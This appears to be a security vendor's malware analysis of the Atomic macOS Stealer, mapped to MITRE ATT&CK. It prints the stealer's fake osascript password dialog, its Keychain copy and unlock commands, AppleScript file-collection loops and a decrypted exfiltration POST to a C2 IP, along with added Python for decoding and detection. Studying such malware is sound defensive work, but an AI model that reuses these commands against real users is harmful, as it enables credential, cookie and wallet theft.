Sıla Özeren | 8 MIN READ

CREATED ON April 10, 2025

Atomic Stealer: Dissecting 2024's Most Notorious macOS Infostealer

The Atomic macOS Stealer (AMOS) is malicious software designed to exfiltrate sensitive information from macOS systems. It collects data such as Keychain passwords, system information, files from the Desktop and Documents folders, and macOS user passwords. The malware also targets browser data, including cookies and login credentials, and cryptocurrency wallets such as Electrum, Binance, Exodus, Atomic, and Coinomi.

In this blog, we will explore the tactics, techniques, and procedures (TTPs) employed by Atomic Stealer and examine how its operations map to MITRE ATT&CK framework tactics. This analysis provides deeper insight into how AMOS functions and how defenders can better detect and mitigate its impact.

Analyzing Atomic Stealer's Advanced Tactics, Techniques, and Procedures (TTPs)

Gaining notoriety in 2024, Atomic Stealer (AMOS) rapidly established itself as one of the most dangerous info-stealing malware families targeting macOS users. It is typically distributed through deceptive means such as fake advertisements and spoofed applications like Arc Browser. Once executed, it tricks victims into bypassing macOS security prompts and proceeds to extract sensitive data—including credentials, cookies, notes, and cryptocurrency wallet files. With advanced features like AppleScript-based password harvesting and XOR-obfuscated payloads, AMOS exemplifies the growing sophistication of macOS-targeted malware.

This section provides a comprehensive analysis of these TTPs, offering insight into how Atomic Stealer operates, including its infection kill chain and the tools it employs.

Initial Access Methods (TA0001)

T1566.002 - Phishing: Spearphishing Link

Fake Application Installers: Attackers create counterfeit versions of popular applications such as Tor Browser, Photoshop CC, and Microsoft Office [1]. Unsuspecting users download these malicious installers, typically packaged as disk image (.dmg) files, which execute the malware instead of the legitimate software.

Malvertising via Google Ads: Cybercriminals exploit Google's advertising platform to display deceptive ads that redirect users to fraudulent websites hosting Atomic Stealer [1]. For instance, users searching for software like "Arc Browser" may encounter malicious ads leading to spoofed sites (e.g., aricl[.]net) that prompt the download of a malicious DMG installer.

Terminal Command Execution (ClickFix Technique): Users are deceived into executing commands via the Terminal application [2]. For example, a fake installer may instruct users to open Terminal and drag-and-drop a file to install an app, which actually executes the malicious payload.

Figure 1. Fake DeepSeek Website Luring Victims to Drag-and-Drop Installation

Execution (TA0002)

T1204.002 - User Execution: Malicious File 

Above, I emphasized that users searching for legitimate software, such as Arc Browser, might encounter deceptive ads that direct them to counterfeit websites. These websites prompt users to download malicious disk image files (for example, "App_v1.0.4.dmg").

Upon opening these files, users are instructed to bypass macOS Gatekeeper—a security feature intended to block untrusted software—by right-clicking the application and selecting "Open." This action permits the execution of unsigned or ad-hoc signed applications, circumventing Apple's security measures.

T1059.002 – Command and Scripting Interpreter: AppleScript

The AppleScript method involves the malware displaying deceptive dialog boxes to users, requesting their system passwords under the guise of legitimate system prompts.

For instance, Atomic Stealer may present a dialog box with a message such as "The launcher needs permissions to enable background auto-updates. Please enter your password." The full osascript command that produces it is shown below.

Atomic Stealer employs AppleScript commands executed via osascript to create these fake dialog boxes. The use of the "hidden answer" parameter ensures that the password input is masked, mimicking standard password entry fields and enhancing the deception.

osascript -e 'display dialog "The launcher needs permissions to enable background auto-updates.\n\nPlease enter your password." with title "Auto-Updates System" default answer "" with icon caution buttons {"Continue"} default button "Continue" with hidden answer'

This prompt is designed to look like a legitimate system request, increasing the likelihood that users will enter their passwords. Once the password is obtained, the malware can use it to unlock the Keychain, escalate privileges, or move further within the system.

Defense Evasion (TA0005)

Obfuscated Files or Information (T1027)

The new variant of Atomic Stealer employs heavy obfuscation through XOR encoding with a static key (0x91). A function named bewta() is responsible for de-xoring various bytes at runtime, dynamically decoding strings and payloads [3]. 

This runtime decoding significantly complicates static analysis by concealing critical components such as AppleScript payloads and hardcoded asset targets. XOR encoding is a widely used obfuscation tactic in malware development, allowing threats like Atomic Stealer to bypass signature-based detection mechanisms employed by antivirus (AV) and endpoint detection and response (EDR) solutions.
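To make the obfuscation concrete, here is an added analyst-side example (my own code, not AMOS's bewta() routine and not from the post) that undoes the single-byte XOR scheme described above. It uses the 0x91 key the post reports, carves printable strings out of a decoded blob the way one would during triage, and also recovers an unknown single-byte key by brute force, so it generalises to other static-key variants. The sample blob is constructed here for illustration and is not real malware data.

```python
from typing import List, Optional

# Added example (not AMOS code): decode strings hidden with the single-byte XOR
# scheme the post describes. STATIC_KEY is the 0x91 key reported for the variant;
# the sample blob below is constructed for illustration, not real malware data.

STATIC_KEY = 0x91


def xor_decode(data: bytes, key: int = STATIC_KEY) -> bytes:
    """XOR every byte with the key. XOR is its own inverse, so the same call
    encodes and decodes; the malware's runtime de-xoring does exactly this."""
    return bytes(b ^ key for b in data)


def carve_strings(blob: bytes, key: int = STATIC_KEY, min_len: int = 6) -> List[str]:
    """Decode a blob and return printable-ASCII runs of at least min_len chars,
    the triage step that surfaces AppleScript fragments and file-name targets."""
    decoded = xor_decode(blob, key)
    found, run = [], []
    for b in decoded:
        if 0x20 <= b < 0x7F:
            run.append(chr(b))
            continue
        if len(run) >= min_len:
            found.append("".join(run))
        run = []
    if len(run) >= min_len:
        found.append("".join(run))
    return found


def recover_key(blob: bytes, known_plaintext: bytes = b"osascript") -> Optional[int]:
    """Brute-force any single-byte key: only 256 candidates exist, so try each
    and look for a string the sample is expected to contain. This generalises
    beyond 0x91 to other static-key variants."""
    for candidate in range(256):
        if known_plaintext in xor_decode(blob, candidate):
            return candidate
    return None


# Constructed sample: two strings the stealer would hide, separated by
# non-printable bytes, then XOR-encoded with the static key.
_PLAINTEXT = (b"\x00osascript -e 'display dialog ... with hidden answer'"
              b"\x00\x01Cookies.binarycookies\x00")
SAMPLE_BLOB = xor_decode(_PLAINTEXT, STATIC_KEY)

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB)
    print(f"recovered key: {key:#04x}")
    for s in carve_strings(SAMPLE_BLOB, key):
        print("decoded:", s)
```

Because XOR with a static key leaks plaintext structure (every byte is shifted by the same constant), a known-plaintext guess such as "osascript" or a file name from the collection routine is usually enough to recover the key from a sample in seconds, which is why this layer defeats signatures but not a human analyst.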

Credential Access (TA0006)

T1555.001 - Credentials from Password Stores: Keychain

As stressed earlier in the Command and Scripting Interpreter section, Atomic Stealer prompts for and captures the user's password, then accesses the macOS Keychain.

osascript -e 'display dialog "The launcher needs permissions to enable background auto-updates.\n\nPlease enter your password." with title "Auto-Updates System" default answer "" with icon caution buttons {"Continue"} default button "Continue" with hidden answer'

Then, Atomic Stealer copies the Keychain database to a new directory:

cp ~/Library/Keychains ~/Documents/data/Keychain/kc.db

Then, it unlocks the keychain and uses the bundled open-source tool Chainbreaker to extract credentials. This allows exfiltration of login data stored in the keychain.

security unlock-keychain -p <password> /Users/<user>/Library/Keychains/login.keychain-db

Discovery (TA0007)

Atomic Stealer (AMOS) performs system reconnaissance by executing various commands to gather detailed information about the victim’s device. Commonly used commands include uname, sw_vers, ioreg, as well as:

  • system_profiler SPHardwareDataType
  • system_profiler SPDisplaysDataType

The collected information is typically stored in files like Sysinfo.txt and is leveraged for command-and-control (C2) communication. This data also enables attackers to tailor their tactics, techniques, and procedures (TTPs) to the target system's specific configuration, optimizing the impact of the subsequent stages of the attack.

Collection (TA0009)

T1005 – Data from Local System 

Atomic Stealer employs AppleScript commands to duplicate specific files and gather sensitive information from the infected macOS system. 

It targets Safari cookies by copying the Cookies.binarycookies file and extracts Notes data by duplicating files like NoteStore.sqlite, NoteStore.sqlite-shm, and NoteStore.sqlite-wal [4]. 

Additionally, Atomic Stealer iterates through files in the Desktop and Documents directories, selecting those with particular extensions and sizes, and duplicates them to a designated folder for exfiltration. 

  • Steals Safari Cookies

duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing

  • Notes Data

duplicate file "NoteStore.sqlite" ...
duplicate file "NoteStore.sqlite-shm" ...
duplicate file "NoteStore.sqlite-wal" ...

  • Document Collection Loop

repeat with aFile in (desktopFiles & documentsFiles)
  if fileExtension is in extensionsList and fileSize ≤ 51200 then
    duplicate aFile to folder fileGrabberFolderPath with replacing
  end if
end repeat

Exfiltration (TA0010)

Exfiltration Over C2 Channel (T1041)

In previous sections, we stressed that Atomic Stealer is designed to collect data such as Keychain passwords, system information, files from the desktop and documents folders, and macOS user passwords. 

AMOS typically exfiltrates this data by compressing it into a ZIP archive and transmitting it over an existing command-and-control (C2) channel. The exfiltration process involves sending the ZIP file via HTTP POST requests to a C2 server. 

For instance, a decrypted string from AMOS indicates the use of the following HTTP request [5]:

POST /joinsystem HTTP/1.1
Host: 193.233.132.188
Content-Type: application/x-www-form-urlencoded
Content-Length: 481728

Form item: "BuildID" = "2"
Form item: "user" = "Vulkan3000"
Form item: "B64" = "<base64-encoded zip>"

The exfiltrated archive includes:

  • Cookies.binarycookies

  • NoteStore.sqlite & friends

  • Wallets (e.g., Exodus/passphrase.json)

  • Keychain file

  • Sysinfo.txt

  • Password prompt log

How Does Picus Help Against the Atomic Stealer?

We strongly suggest simulating threats such as Atomic Stealer to test the effectiveness of your security controls against their attacks using the Picus Security Validation Platform.

Picus Threat Library includes the following threats for Atomic Stealer:

Threat ID   Threat Name                              Attack Module
29912       Atomic macOS Stealer Malware Campaign    macOS Endpoint
79314       Atomic Infostealer Download Threat       Network Infiltration
97401       Atomic Infostealer Email Threat          E-mail Infiltration

Defense Strategies Against Atomic Stealer's Attacks

To mitigate the impact of Atomic Stealer campaigns, organizations should adopt a layered defense approach:

Deploy Advanced EDR with AppleScript and Keychain Monitoring

Atomic Stealer’s reliance on AppleScript and keychain manipulation requires macOS-specific behavioral monitoring. Deploy an EDR solution that can track osascript activity, detect prompts requesting hidden password fields, and flag access to sensitive files like Cookies.binarycookies and NoteStore.sqlite. Behavior-based rules for detecting rapid access to multiple personal directories or suspicious use of security unlock-keychain are essential.
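The following is an added example of what those behavior-based rules can look like in code; it is my own illustration, not the post's material and not any EDR vendor's rule language. It covers the osascript "hidden answer" prompt from the Execution section, the security unlock-keychain and Keychain copy from the Credential Access section, and the sweep across Cookies.binarycookies and NoteStore.sqlite from the Collection section, run over a constructed JSON-lines telemetry feed. The event schema (type, pid, process, cmdline, path), the allow-list of expected readers, and the two-file threshold are assumptions to be tuned per environment.

```python
import json
import os
from collections import defaultdict
from typing import Dict, List, Tuple

# Added example (not from the post or any EDR vendor): detection logic for the
# behaviours described in the post, run over a constructed JSON-lines event feed.
# The event schema (type, pid, process, cmdline, path) is an assumption.

# Files AMOS is reported to read or copy, with the label an alert should carry.
SENSITIVE_FILES = {
    "Cookies.binarycookies": "Safari cookies",
    "NoteStore.sqlite": "Notes database",
    "login.keychain-db": "login keychain",
    "passphrase.json": "wallet passphrase",
}
# Processes that legitimately open those files (constructed allow-list; tune per fleet).
EXPECTED_READERS = {"Safari", "Notes", "securityd", "Exodus"}


def check_process(event: dict) -> List[str]:
    """Rules for a single process-execution event."""
    findings = []
    cmd = event.get("cmdline", "")
    argv = cmd.split()
    exe = os.path.basename(argv[0]) if argv else ""
    low = cmd.lower()
    # Fake password prompt: osascript dialog with a masked ("hidden answer") field.
    if exe == "osascript" and "display dialog" in low and "hidden answer" in low:
        findings.append("osascript dialog with hidden answer (password-prompt lure)")
    # Keychain unlocked non-interactively with the password on the command line.
    if exe == "security" and "unlock-keychain" in argv and "-p" in argv:
        findings.append("security unlock-keychain with inline password")
    # Shell copy of a credential store or cookie file.
    if exe in ("cp", "ditto", "rsync"):
        hits = [name for name in SENSITIVE_FILES if name in cmd]
        if hits:
            findings.append("copy of sensitive file(s): " + ", ".join(hits))
    return findings


def check_file_access(events: List[dict], threshold: int = 2) -> Dict[int, List[str]]:
    """Flag pids where a process outside the allow-list opened at least
    `threshold` distinct sensitive files (a sweep across personal data)."""
    touched = defaultdict(set)
    for ev in events:
        if ev.get("type") != "file_open":
            continue
        name = os.path.basename(ev.get("path", ""))
        if name in SENSITIVE_FILES and ev.get("process") not in EXPECTED_READERS:
            touched[ev["pid"]].add(name)
    return {pid: sorted(names) for pid, names in touched.items() if len(names) >= threshold}


def analyse(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Parse JSON lines and return (pid, finding) alerts in detection order."""
    events = [json.loads(line) for line in log_lines if line.strip()]
    alerts = []
    for ev in events:
        if ev.get("type") == "process_exec":
            alerts.extend((ev["pid"], f) for f in check_process(ev))
    for pid, names in check_file_access(events).items():
        alerts.append((pid, "multiple sensitive files opened: " + ", ".join(names)))
    return alerts


# Constructed telemetry: one AMOS-like chain plus benign noise (not real logs).
SAMPLE_EVENTS = [
    {"type": "process_exec", "pid": 4101, "process": "osascript",
     "cmdline": "/usr/bin/osascript -e 'display dialog \"Please enter your password.\" "
                "default answer \"\" with hidden answer'"},
    {"type": "process_exec", "pid": 4102, "process": "cp",
     "cmdline": "cp /Users/victim/Library/Keychains/login.keychain-db "
                "/Users/victim/Documents/data/Keychain/kc.db"},
    {"type": "process_exec", "pid": 4103, "process": "security",
     "cmdline": "security unlock-keychain -p REDACTED "
                "/Users/victim/Library/Keychains/login.keychain-db"},
    {"type": "process_exec", "pid": 4104, "process": "osascript",
     "cmdline": "/usr/bin/osascript -e 'display dialog \"Update complete\" buttons {\"OK\"}'"},
    {"type": "file_open", "pid": 4105, "process": "osascript",
     "path": "/Users/victim/Library/Cookies/Cookies.binarycookies"},
    {"type": "file_open", "pid": 4105, "process": "osascript",
     "path": "/Users/victim/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite"},
    {"type": "file_open", "pid": 300, "process": "Safari",
     "path": "/Users/victim/Library/Cookies/Cookies.binarycookies"},
    {"type": "file_open", "pid": 4106, "process": "osascript",
     "path": "/Users/victim/Desktop/report.pdf"},
]
SAMPLE_LOG = [json.dumps(ev) for ev in SAMPLE_EVENTS]

if __name__ == "__main__":
    for pid, finding in analyse(SAMPLE_LOG):
        print(f"pid {pid}: {finding}")
```

The benign osascript dialog (pid 4104) and Safari's own read of its cookie file (pid 300) produce no alert, which is the point of keying on the hidden-answer field and on the reading process rather than on osascript or the file path alone; the allow-list is where most tuning effort will go in a real fleet.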

Continuously Test and Validate Security Controls

Atomic Stealer follows a clear sequence of behaviors—initial access through spoofed installers, AppleScript-based prompting, file collection, and exfiltration. Implementing Breach and Attack Simulation (BAS) platforms, such as Picus Security Control Validation (SCV), enables security teams to emulate realistic, multi-stage attack scenarios that mirror the tactics, techniques, and procedures (TTPs) observed in Atomic Stealer campaigns. 

By continuously testing your environment against these scenarios, BAS tools can expose blind spots, validate existing controls, and generate actionable insights to improve detection and response capabilities—helping you stay one step ahead of sophisticated adversaries.

Monitor Network for Plain HTTP POSTs with Encoded Archives

Atomic Stealer uses HTTP POST requests (not HTTPS) to exfiltrate base64-encoded zip archives. Implement network monitoring tools that alert on suspicious unencrypted uploads to unknown IPs or unusual POST activity with large payloads and encoded parameters. Consider blocking known IOCs like 193.233.132.188 and 46.101.104.172 at the network level.
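As an added example serving both the Exfiltration section above and this network-monitoring recommendation, here is a small inspector (my own code, not the post's and not any product's) that takes a captured plain-HTTP request and reports the AMOS exfiltration tells: a POST to a bare IP, a destination matching the IOCs named in this post, a large unencrypted body, and a form field that base64-decodes to a ZIP, whose member names it lists. The sample request it builds mirrors the /joinsystem request shown in the post but with constructed, non-sensitive content; the 100 KB size threshold is an assumption.

```python
import base64
import binascii
import io
import ipaddress
import zipfile
from urllib.parse import parse_qs, urlencode

# Added example (not from the post or any vendor): inspect a captured HTTP POST
# for the AMOS exfiltration pattern, a form-urlencoded body whose "B64" field
# carries a base64-encoded ZIP, sent in clear text to a bare IP address.

ZIP_MAGIC = b"PK\x03\x04"
KNOWN_C2 = {"193.233.132.188", "46.101.104.172"}  # IOCs named in this post
LARGE_BODY = 100 * 1024  # constructed threshold; tune to your environment


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (request line, header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_exfil(raw: bytes) -> dict:
    """Return a verdict listing why this request looks like AMOS exfiltration."""
    request_line, headers, body = parse_request(raw)
    host = headers.get("host", "")
    verdict = {"host": host, "reasons": [], "archive_members": []}
    if not request_line.startswith("POST "):
        return verdict
    try:
        ipaddress.ip_address(host)
        verdict["reasons"].append("POST to a bare IP address rather than a hostname")
    except ValueError:
        pass
    if host in KNOWN_C2:
        verdict["reasons"].append("destination matches a known AMOS C2 IOC")
    if len(body) > LARGE_BODY:
        verdict["reasons"].append(f"large unencrypted body ({len(body)} bytes)")
    # Walk every form field; a long value that base64-decodes to a ZIP is the tell.
    form = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    for field, values in form.items():
        value = values[0]
        if len(value) < 64:
            continue
        try:
            decoded = base64.b64decode(value, validate=True)
        except binascii.Error:
            continue
        if decoded.startswith(ZIP_MAGIC):
            verdict["reasons"].append(
                f"field '{field}' is a base64-encoded ZIP ({len(decoded)} bytes)")
            with zipfile.ZipFile(io.BytesIO(decoded)) as zf:
                verdict["archive_members"] = zf.namelist()
    return verdict


def build_sample_request() -> bytes:
    """Constructed sample mirroring the decrypted request shown in the post."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("Cookies.binarycookies", b"cook" * 60000)  # filler, not real data
        zf.writestr("Sysinfo.txt", b"Model Name: MacBook Pro\n")
        zf.writestr("Exodus/passphrase.json", b'{"passphrase": "CONSTRUCTED"}')
    body = urlencode({"BuildID": "2", "user": "example-user",
                      "B64": base64.b64encode(buf.getvalue()).decode()}).encode()
    head = ("POST /joinsystem HTTP/1.1\r\nHost: 193.233.132.188\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body


if __name__ == "__main__":
    result = inspect_exfil(build_sample_request())
    for reason in result["reasons"]:
        print("ALERT:", reason)
    print("archive contents:", result["archive_members"])
```

The ZIP-magic check is what separates this from a generic "large POST" rule: legitimate uploads of encoded data are common, but a form field whose decoded bytes begin with PK\x03\x04 and unpack to names like Cookies.binarycookies or Sysinfo.txt is a high-confidence match for the archive layout described in the Exfiltration section.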

Establish and Test Incident Response Procedures

Create an incident response (IR) playbook tailored to macOS threats. Include steps for quarantining systems running unsigned AppleScript payloads or showing signs of unauthorized keychain access. Regularly conduct tabletop exercises simulating an Atomic Stealer infection—from initial breach to credential theft and exfiltration—to ensure readiness.

References

[1] H. Montini, “Atomic Stealer: A Dangerous Threat to Mac Users,” Proven Data, Oct. 16, 2024. Available: https://www.provendata.com/blog/what-is-atomic-stealer-amos/. [Accessed: Apr. 01, 2025]

[2] “Fake DeepSeek Site Infects Mac Users with Atomic (AMOS) Stealer,” eSentire, Feb. 20, 2025. Available: https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer. [Accessed: Apr. 01, 2025]

[3] P. Paganini, “Info stealer attacks target macOS users,” Security Affairs, Apr. 01, 2024. Available: https://securityaffairs.com/161287/malware/info-stealer-malware-macos.html. [Accessed: Apr. 02, 2025]

[4] Cyble, “Atomic Stealer Strikes & Dead Cookies Restoration Rise,” Cyble, Jan. 25, 2024. Available: https://cyble.com/blog/uncovering-atomic-stealer-amos-strikes-and-the-rise-of-dead-cookies-restoration/. [Accessed: Apr. 02, 2025]

[5] Jamf Threat Labs, “Jamf Threat Labs dissects infostealer malware,” Jamf. Available: https://www.jamf.com/blog/infostealers-pose-threat-to-macos/. [Accessed: Apr. 02, 2025]
